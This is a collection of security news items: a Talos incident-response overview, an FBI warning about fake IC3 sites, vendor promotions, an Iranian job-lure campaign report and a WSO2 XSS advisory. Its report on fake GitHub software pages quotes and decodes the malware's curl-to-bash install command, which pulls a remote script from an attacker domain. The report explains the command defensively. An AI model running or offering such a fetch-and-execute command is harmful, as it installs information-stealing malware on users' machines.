What happens when you bring in a team of cybersecurity responders? How do we turn chaos into control, and what is the long-term value that Talos IR provides to the organizations we work with?

**What happens when you engage Cisco Talos Incident Response?**

Wednesday, September 24, 2025 06:00

In today’s world, cybersecurity incidents are not a matter of if, but **when** and **how**. From ransomware attacks to data breaches exposing sensitive information, organizations face a changing threat landscape. As a result of cybersecurity attacks, organizations can experience downtime, financial losses, reputational damage and regulatory penalties. That’s when it really helps to have a team like Cisco Talos Incident Response (Talos IR) by your side. But what exactly happens when you bring in a team of cybersecurity responders? How do we turn chaos into control, and what is the long-term value that Talos IR provides to the organizations we work with?

This blog post takes you behind the scenes of engaging an incident response (IR) firm like Talos IR. We will walk through what really happens during an IR engagement, from the moment you pick up a phone and call for help in the middle of a crisis to the long-term changes that make your organization stronger and more secure.

**Why engage an IR team? **

Before diving into the process, let’s address the fundamental question: Why engage an IR firm? Cybersecurity incidents are complex, often requiring specialized skills, tools and experience that internal teams may lack. The Talos Year In Review Report highlights the rising frequency and sophistication of attacks; as a result, many security teams are struggling to address emergencies due to resource constraints or the complexity of response at scale. 

Engaging an IR firm like Talos IR brings several key advantages: 

*   **Speed and availability**: We provide 24/7 global support, with response times often under a few hours for remote engagements and on-site support wherever needed. Engaging an IR firm is like calling in a S.W.A.T. team for a cybersecurity crisis. We bring the tools, tactics and experience to contain the threat and minimize damage while guiding the organization toward recovery and increasing future resilience. 
*   **Expertise**: With numerous incident responders and threat intelligence analysts, all of whom have access to industry-leading Talos threat intelligence, the team has deep experience handling diverse threats, from ransomware to business email compromise (BEC). We handle it all, from “small” attacks on a single organization to a country-level threats. We don’t focus just on typical IT environments — we work with ICS/OT, cloud or mobile forensic, as well.  
*   **Vendor-agnostic approach**: Talos IR works with customers’ existing infrastructure and tooling, whether you use Cisco products or not. We simply don’t like to wait for deployment of tools before getting our hands dirty in all the logs, consoles and forensic artifacts. At a time when you are already resource-constrained, the last thing we want to do is make you replace an existing security solution, such as endpoint detection and response (EDR), on the endpoints. 
*   **Comprehensive services**: Beyond emergency response, Talos IR provides proactive services like Threat Hunting and IR Planning to strengthen your security posture before an incident happens or after to build up resilience.

**Overview of the IR lifecycle **

The IR process typically follows a structured lifecycle, based on frameworks such as NIST SP 800-61 or the SANS Institute’s model. Talos IR aligns with these best practices, tailoring its approach to organization’s unique needs at the time of crisis and beyond. Handling incidents day in and day out has given Talos IR a deep well of experience, and we’ve built that knowledge into processes to support every organization we work with. The lifecycle of our IR typically includes: 

1.  Preparation 
2.  Identification 
3.  Containment 
4.  Eradication 
5.  Recovery 
6.  Lessons learned 

When you engage Talos IR, we apply this lifecycle with a blend of technical prowess, threat intelligence and collaborative teamwork. Let’s walk through each phase in detail.

**Phase 1: Preparation (before the incident) **

Preparation is the foundation of effective IR. While many organizations only engage IR firms during a crisis, proactive engagement with Talos IR can significantly reduce the impact of future incidents. With a Talos IR retainer, you secure an agreement that ensures rapid response during an emergency and access to proactive services tailored to your organization’s risk profile and needs, offering: 

*   **Emergency response**: Guaranteed access to a global team within a short time of experiencing of an incident. During major global cybersecurity events like Wannacry, Heartbleed or Log4J or others, an existing retainer can be the difference between receiving immediate help and waiting days to weeks.
*   **Proactive services**: Access to proactive services for Threat Hunting, Tabletop Exercises or Purple Teaming
*   **Relationship building**: Familiarity with your environment, reducing response time during a crisis

These services build trust and familiarity, ensuring Talos IR can hit the ground running during an emergency.

**Phase 2: Identification (beginning of incident) **

When a cybersecurity incident occurs, the first step is identifying and confirming the threat, whether it’s a ransomware attack, phishing campaign, or data breach. This is often when organizations reach out to Talos IR. Talos IR’s emergency response team is available 24/7 and can be reached via phone or email, but phone is the fastest and most direct way to reach our dedicated IR team.  

**Initial call**

During the first call, Talos IR gathers critical information to help us move onto analysis as soon as possible: 

*   **Nature of the incident**: What symptoms were observed (e.g., encrypted files, suspicious emails, new files on the webserver that were committed outside of the development lifecycle)? 
*   **Affected systems**: Which servers, endpoints, or networks are impacted? 
*   **Business impact**: Is the incident disrupting operations or exposing sensitive data? 
*   **Existing actions**: What steps have been taken so far? 
*   **Visibility**: What existing systems and tools can we access to handle the incident? Would complimentary Cisco tools help close a current gap, such as no EDR solution on a specific network? 

**Triage, scoping and analysis** 

Talos IR deploys a team led by an Incident Commander, who coordinates efforts and communicates with the stakeholders. The Incident Commander is supported by a skilled team of responders, threat analysts and project managers who keep everything moving and progress analysis 24/7. We typically start our work with in-depth triage of your environment which often involves: 

*   **Log analysis**: Reviewing logs from security information and event management (SIEM) systems, EDR tools, or network devices to identify indicators of compromise (IOCs)
*   **Threat intelligence**: Leveraging Talos global telemetry to match IOCs against known adversary tactics, techniques and procedures (TTPs)
*   **Digital forensics**: Collecting and analyzing evidence, such as memory dumps or disk images, to understand the attack’s scope

What makes IR truly effective is having access to as much relevant data as possible from the very beginning. The earlier our team can review endpoint telemetry, network traffic, identity logs and other critical data points, the faster we can determine what happened, how far the threat spread and what needs to be done to contain the threat. We often use the triage process to understand and search for: 

*   **Initial access vector**: Common vectors include phishing, exploited vulnerabilities (e.g., Microsoft Exchange Server flaws), or misconfigured VPN servers. You can read all about the trends we see each quarter here. 
*   **Adversary goals**: Is the attacker after data theft, ransomware deployment, or persistent access? 
*   **Scope**: How many systems, users, or networks are affected? 
*   **Persistence mechanisms**: Are there backdoors, scheduled tasks, or web shells that allow re-entry? 
*   **Data exfiltration**: Was sensitive data stolen? 

Talos IR provides an initial assessment, outlining the incident’s severity and recommended next steps, and keeps you updated daily. This phase sets the stage for containment, where speed is critical to limit damage. This analysis goes on for a number of days and typically uncovers additional information that adds to the picture during each 24-hour cycle.

**Phase 3: Containment (stopping the attack) **

Containment focuses on preventing the threat from spreading further while preserving evidence for analysis. Talos IR employs a technology-agnostic approach, working with existing tools to implement short-term and long-term containment strategies while simultaneously looking to minimize business impact. 

**Short-term containment** 

Immediate actions to isolate the threat typically include: 

*   **Network segmentation**: Isolating affected systems or subnets to prevent lateral movement
*   **Account lockdown and/or password changes**: Disabling compromised accounts, changing compromised passwords, or enforcing multi-factor authentication (MFA). Talos IR frequently observes incidents where the lack of MFA enables ransomware or business email compromise (BEC) attacks. 
*   **Process termination**: Isolating malicious processes, such as ransomware encryptors or command-and-control (C2) beacons, when identified. Reimaging devices is often a recommended step, but it depends on the extent of the breach.
*   **Firewall rules**: Blocking malicious IPs or domains identified through Talos’ threat intelligence

**Long-term security hardening** 

While short-term countermeasures stop immediate damage, long-term security hardening ensures the attacker can’t regain access. By working together with an organization on emergency response, Talos IR gains a great understanding of what needs to be applied to build long term resistance. Some of these recommendations would be: 

*   **Patching vulnerabilities**: Addressing exploited flaws, such as unpatched servers or vulnerable web applications
*   **Endpoint protection**: Extending EDR deployments to monitor for residual threats on systems that were previously unprotected
*   **Strengthening resilience:** Taking a long-term, strategic approach to uncover and address weaknesses in your organization’s security posture to better prepared for future threats
*   **Improving efficiency and consistency:** Developing clear policies and procedures, while automating routine tasks such system hardening to reduce risk

**Phase 4: Eradication (removing the threat) **

Once the threat is contained, Talos IR focuses on recommendations for completely removing all remnants of the adversary from the environment. Eradication is a delicate process that needs to balance business needs with recovery operations. Eradication typically involves: 

*   **Account remediation**: Resetting passwords and revoking compromised credentials. This may sound familiar from the containment phase, but often it is necessary to do two or more credential purges during a major incident. 
*   **System rebuilds**: In severe cases, rebuilding affected systems from clean backups to eliminate hidden threats.
*   **Reverting adversary changes**: Some sophisticated adversaries will do things like change firewall rules, embed fileless malware in the registry, or create future scheduled tasks as “sleeper agents.” Detecting, documenting and reverting these changes can be the most difficult and important part of eradication. 

Before wrapping up this phase, Talos IR verifies eradication through: 

*   **Threat hunting**: Scanning for residual IOCs or anomalous behavior
*   **Log reviews**: Confirming no further malicious activity

This process minimizes the risk of the adversary returning, as seen in cases where adversaries used tools like Cobalt Strike to maintain persistence. A single overlooked persistence mechanism is enough to let the adversary back in at a later date, which is why a thorough forensic review by an experienced IR team is critical. 

**Phase 5: Recovery (restoring operations) **

Recovery aims to restore systems and operations to normal while enhancing security to prevent recurrence. Talos IR collaborates with IT and business teams to ensure a smooth transition. If it is necessary to accept some risk in order to get business operations back online, the Talos IR Incident Commander will work with your organizational leadership to ensure that the risk is minimized and understood, and that compensating controls are applied.  

Key recovery recommendations often include: 

*   **Restoring from backups**: Deploying clean backups to affected systems, ensuring they’re free of malware
*   **Application testing**: Verifying critical applications (e.g., ERP systems) function correctly post-recovery
*   **User access**: Gradually restoring user access with strengthened controls, such as MFA
*   **Alternative processes**: Implementing manual or temporary workflows if systems remain offline
*   **Stakeholder communication**: Coordinating with PR and legal teams to manage external messaging and regulatory notifications
*   **Employee training**: Educating staff on phishing awareness or secure practices to prevent future incidents
*   **Logging improvements**: Enhancing visibility to overcome the logging deficiencies
*   **Patch management**: Establishing processes to prevent exploitation of known vulnerabilities

**Phase 6: Lessons learned (building resilience) **

The final phase of IR involves analyzing the incident to extract lessons and improve future preparedness. Talos IR’s approach ensures that insights translate into actionable strategies. Talos IR delivers a comprehensive incident report, including: 

*   **Incident summary**: A timeline of events, from initial detection to resolution 
*   **Findings**: Details on the attacker’s TTPs, entry points and impact
*   **Recommendations**: Specific actions to ensure long-term and short-term improvements

**Ongoing partnership **

At Talos IR, we believe IR isn’t only a service we provide; it’s a relationship and the ultimate team sport. We’re not here just for the crisis; we’re here to support before, during and long after the incident is resolved. As many of our long-term retainer customers like Veradigm have observed, those multi-year relationships pay great dividends during incidents:  

_“With the \[Talos IR\] retainer service we really appreciate established and met Service Level Agreements (SLAs). Plus, the knowledge of Cisco’s IR team on our unique environment, prior incidents, and their intelligence on the latest threats ensure we smoothly navigate, and balance preparation exercises and incidents based on our unique needs. Time to response in our SLA along with the unique knowledge, there isn’t a delay as one would expect. They are ready and we have ‘muscle memory’ from both tabletop scenarios and real-life situations. As a result of being in the highly regulated world of healthcare and with the constant need to consider patient safety, our circumstances can be tense from the start. They know how we need to react based on both exercises and incidents and can navigate smoothly in delicate situations/balances with our unique needs in mind,”_ **_Jeremy Maxwell, Veradigm CISO_****_._** 

This is one of many stories we observe during our engagements with different organizations. For Talos IR, once the immediate threat is handled, the real work begins. We help to strengthen your defenses through ongoing support, so your organization is better prepared for the future. We keep the defenders in the loop with up-to-date threat intelligence, and we run regular training and drills to make sure that various teams know exactly what to do if something happens again. 

It’s a partnership built on trust, experience and a shared goal: keeping your organization resilient in a constantly evolving threat landscape.

What happens when you engage Cisco Talos Incident Response?

The FBI is warning internet users about fake versions of its official IC3 cybercrime reporting website. Learn how to spot these ‘spoofed’ sites, avoid scams where criminals impersonate agents, and protect your personal information by following the FBI’s crucial safety tips.

The Federal Bureau of Investigation (FBI) has issued a critical Public Service Announcement (PSA) revealing that cybercriminals are creating fake, or ‘spoofed,’ versions of the FBI’s IC3 (Internet Crime Complaint Center) website to steal user data.

IC3 is a primary tool where people can file reports on cybercrime and online scams. The platform was established in 2000 as the Internet Fraud Complaint Centre but was later renamed in 2003 to represent its overall mission.

According to the FBI’s advisory, threat actors create these fake websites by making slight changes to the legitimate domain name, such as alternate spellings or different web addresses, as seen in previous cases like ɢoogle.com rather than Google.com. This is done to “gather personally identifiable information entered by a user into the site, including name, home address, phone number, email address, and banking information.”

The advisory warns that users may unknowingly visit these fake portals while attempting to file an official report, exposing their sensitive data. The goal of these fake sites is to steal personal information and trick people into monetary scams.

The FBI also warns that these scammers may even pretend to be IC3 staff. They might contact you, claiming they can get your lost money back, but only if you pay them a fee first. This is a clear sign of a scam, as the FBI and IC3 will never ask for payment to help a victim. In fact, between December 2023 and February 2025, the agency received over 100 reports of these impersonation scams.

****Not The First Time****

This is not the first time that scammers have impersonated the Internet Crime Complaint Center to carry out possible phishing or malware campaigns. As far back as 2018, fraudulent emails and websites mimicking IC3 were used to trick users into providing sensitive information, sometimes even embedding malicious files for installation.

Screenshots of fake emails sent by hackers back in February 2018 (Screenshot credit: Hackread.com)

****What can you do to protect yourself?****

The FBI has some crucial advice. The safest way to access the site is to type www.ic3.gov directly into your browser’s address bar. The FBI specifically advises against using search engines and clicking on ‘sponsored’ results, which are often paid ads for these fake sites.

Always check the URL to make sure it ends in ‘.gov’ and has no misspellings, and avoid clicking on links with low-quality graphics, which are another hallmark of fraudulent websites.

Keep in mind that the IC3 does not have any social media pages, so if you see one claiming to be official, it’s a fake. If you fall victim to one of these impersonation scams, be sure to report it to the real IC3 site and provide as much detail as possible, including any financial transaction information.

FBI Warns of Fake IC3 Websites Designed to Steal Personal Data

Binding to an unrestricted ip address in GitHub allows an unauthorized attacker to execute code over a network.

CVE-2025-55322: OmniParser Remote Code Execution Vulnerability

Malwarebytes for Teams now includes personal VPN to encrypt your traffic and broaden your access across the web.

Running a small business today can hardly be done from a single device, a single location, or a single network.

Staying cybersecure is quite the same.

To extend the security and privacy of small business owners, no matter where you are, Malwarebytes for Teams now includes personal VPN access, for no additional cost, for all registered devices. Whether you’re typing up a draft on your tablet at a café, answering urgent emails from your smartphone at the airport, or just protecting your browsing activity on your laptop, connecting to a personal VPN provides that extra comfort that what you’re doing online is your business and your business only.

With a personal VPN you can:

*   Guard your online activity from prying eyes, whether on your laptop, smartphone, or tablet.
*   Access information, content, and resources that are typically restricted by location.
*   Maintain high speed connections for everything you do.

VPNs (Virtual Private Networks) have a bit of a dual reputation right now: They’re either IT tools that help multinational enterprises connect to corporate networks, or they’re covert programs that help paranoid privacy hawks slip by undetected online. The truth is that VPNs are for everyone, and that’s because what they offer is a benefit to all.

VPNs encrypt and protect your online traffic so that eavesdroppers can’t spy on your browsing behavior. This is useful both at public locations and in your office or home, because not all cyber snoops are hackers or criminals. In fact, some of the most active eavesdroppers are Internet Service Providers themselves, that sell consumer data for profit.

VPNs also provide a simple way to connect to an increasingly segmented internet. Despite the name, “the world wide web” can appear quite different when you travel to another country. The streaming platforms you enjoy at home can be blocked, their digital libraries can differ, and entirely benign resources can be gated behind separate laws. By connecting to any variety of servers through a VPN, you can access the internet you know and rely on, no matter your physical location.

It’s important to remember, however, that a VPN is just one part of a larger cybersecurity strategy. You still need to protect your small business’s devices from malware infections, rogue viruses, shady websites, and online scams.

For those threats, Malwarebytes for Teams also keeps you safe, especially when you’re mobile.  

Malwarebytes Scam Guard is available on iOS and Android

Malwarebytes Browser Guard is a free browser add-on that stops invasive ad trackers and flags dangerous websites connected to cybercriminal networks that are cleverly disguised to steal your information or infect your device. And for every other type of concerning message, email, link, or QR code, Malwarebytes Scam Guard for iOS and Android provides 24/7, AI-powered evaluations on who to trust, where to click, and what to ignore.

As every small business is unique, every security plan must adapt. Malwarebytes for Teams is proud to offer the security and privacy options that keep a modern mobile business safe online from hackers, scammers, and digital snoops.

 Malwarebytes for Teams now includes VPN 

Fake software—including Malwarebytes and LastPass—is currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Unfortunately, Malwarebytes for Mac is one of them.

Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.

In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.

The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.

But in other, less obvious cases, you may see search results like these:

These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.

The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.

Here’s a technical breakdown of the instructions provided to the visitor:

*   /bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
*   The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
*   $(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d decodes the long string.
*   curl -fsSL is a command to download data from the web. The options mean:
    
    *   \-f: Fail silently for HTTP errors.-s: Silent mode (no progress bar).-S: Show errors if -s is used.
    
    *   \-L: Follow redirects.

So, putting all this together:

The inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh

The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

The files to download have already been taken down, but users that recognize this chain of infection are under advice to thoroughly check their machines for an infection.

Impersonated software besides Malwarebytes and LastPass included:

*   1Password
*   ActiveCampaign
*   After Effects
*   Audacity
*   Auphonic
*   Basecamp
*   BetterSnapTool
*   Biteable
*   Bitpanda
*   Bitsgap
*   Blog2Social
*   Blue Wallet
*   Bonkbot
*   Carbon Copy Cloner
*   Charles Schwab
*   Citibank
*   CMC Markets
*   Confluence
*   Coolors
*   DaVinci Resolve
*   DefiLlama
*   Desktop Clockology
*   Desygner
*   Docker
*   Dropbox
*   E-TRADE
*   EigenLayer
*   Fidelity
*   Fliki
*   Freqtrade Bot
*   Freshworks
*   Gemini
*   GMGN AI
*   Gunbot
*   Hemingway Editor
*   HeyGen
*   Hootsuite
*   HTX
*   Hypertracker
*   IRS
*   KeyBank
*   Lightstream
*   Loopback
*   Maestro Bot
*   Melon
*   Metatrader 5
*   Metricool
*   Mixpanel
*   Mp3tag
*   Mural
*   NFT Creator
*   NotchNook
*   Notion
*   Obsidian
*   Onlypult
*   Pendle Finance
*   Pepperstone
*   Pipedrive
*   Plus500
*   Privnote
*   ProWritingAid
*   Publer
*   Raycast
*   Reaper
*   RecurPost
*   Renderforest
*   Rippling
*   Riverside.fm
*   Robinhood
*   Rug AI
*   Sage Intacct
*   Salesloft
*   SentinelOne
*   Shippo
*   Shopify
*   SocialPilot
*   Soundtrap
*   StreamYard
*   SurferSEO
*   Thunderbird
*   TweetDeck
*   Uphold
*   Veeva CRM
*   Viraltag
*   VSCO
*   Vyond
*   Webull
*   Xai Games
*   XSplit
*   Zealy
*   Zencastr
*   Zenefits
*   Zotero

But it’s highly likely that there will be more, so don’t see this as an exhaustive list.

**How to stay safe**

Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:

*   Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
*   Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
*   Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
*   Use real-time anti-malware protection, preferably one that includes a web protection component.

If you have scanned your Mac and found the information stealer:

*   Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
*   If any signs of persistent backdoor or unusual activity remain, strongly consider a **full clean reinstall of macOS** to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
*   After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
*   Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
*   If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.

**We don’t just report on threats – we help safeguard your entire digital identity**

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Fake Malwarebytes, LastPass, and others on GitHub serve malware 

GitHub will address weak authentication and overly permissive tokens in the NPM ecosystem, following high-profile threat campaigns like those involving Shai-Hulud malware.

GitHub Aims to Secure Supply Chain as NPM Hacks Ramp Up

The for-hire platform leverages legitimate cloud-native tools to make detection and disruption harder for defenders and SOC analysts.

Exposed Docker Daemons Fuel DDoS Botnet

Talos discovered that a new PlugX variant’s features overlap with both the RainyDay and Turian backdoors

How RainyDay, Turian and a new PlugX variant abuse DLL search order hijacking

New research from Check Point Research reveals the Iranian cyber group Nimbus Manticore is targeting defence, telecom, and aerospace companies in Europe with fake job offers. Learn how they use advanced malware to steal sensitive data.

A group of Iranian hackers known as Nimbus Manticore is expanding its operations, now focusing on major companies across Europe. According to new research from the cybersecurity firm Check Point Research (CPR), the group is targeting businesses in the defence, telecommunications, and aerospace sectors to steal sensitive information.

Nimbus Manticore, also called UNC1549 or Smoke Sandstorm, has been actively tracked since early 2025 and previously ran the Iranian Dream Job campaign. These campaigns align with the strategic intelligence-gathering goals of Iran’s IRGC, especially during times of heightened geopolitical tension.

****Attack Flow Explained****

The attack starts with a fake email invitation to a job application. This email, which looks very real, directs victims to a fraudulent website built using a React template that mimics well-known companies like Boeing, Airbus, and flydubai.

Email lure (source: CPR)

To make it seem legitimate, each person receives a unique login and password to access the site. These “career” themed websites are registered behind Cloudflare to hide the true location of the server. Once logged in, victims are tricked into downloading a malicious file. This file then begins a complex chain of events to infect their computer.

As shown in the CPR’s research flow chart, the downloaded file, which is a compressed ZIP archive, contains a legitimate-looking program (setup.exe). This program then secretly installs and runs other malicious files, including a backdoor, to take control of the system and communicate with the attackers’ servers.

Attack Chain (Source: CPR)

****New Tools and Widespread Targets****

Inside the downloaded file, the hackers place special malware that is are evolved variant of an older malware called Minibike (also known as SlugResin). Recent activity shows a “significant leap in sophistication” with a new variant, MiniJunk, which demonstrates the group’s efforts to evade detection. Another tool, MiniBrowse, is designed to steal important data, such as passwords, without being noticed.

While Nimbus Manticore has a history of consistently targeting the Middle East, specifically Israel and the UAE, its new focus on Europe is a significant development. Researchers noted that the group has been active in countries like Denmark, Sweden, and Portugal.

The report also notes that a parallel, simpler campaign is in use, with attackers posing as HR recruiters and likely reaching out to victims on platforms like LinkedIn before moving the conversation to email. This separate cluster of activity, previously reported by another firm, PRODAFT, also uses spear-phishing with a less complex set of tools but the same goal of stealing access.

While Check Point Research will continue to track the group’s activities, the firm suggests that companies need to be protected from these types of attacks right at the start, before the fake emails or malicious files can even reach employees.

Iranian Hackers Use Fake Job Lures to Breach Europe’s Critical Industries

An authenticated stored cross-site scripting (XSS) vulnerability exists in multiple WSO2 products due to improper validation of user-supplied input during API document upload in the Publisher portal. A user with publisher privileges can upload a crafted API document containing malicious JavaScript, which is later rendered in the browser when accessed by other users.

A successful attack could result in redirection to malicious websites, unauthorized UI modifications, or exfiltration of browser-accessible data. However, session-related sensitive cookies are protected by the httpOnly flag, preventing session hijacking.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2025-4760

**WSO2 carbon-apimgt affected by an authenticated stored cross-site scripting (XSS) vulnerability**

Moderate severity GitHub Reviewed Published Sep 23, 2025 to the GitHub Advisory Database • Updated Sep 23, 2025

**Package**

maven org.wso2.carbon.apimgt:org.wso2.carbon.apimgt.api (Maven)

**Affected versions**

< 9.31.117

**Patched versions**

9.31.117

maven org.wso2.carbon.apimgt:org.wso2.carbon.apimgt.rest.api.publisher.v1 (Maven)

Published to the GitHub Advisory Database

Sep 23, 2025

Last updated

Sep 23, 2025

Tag

#git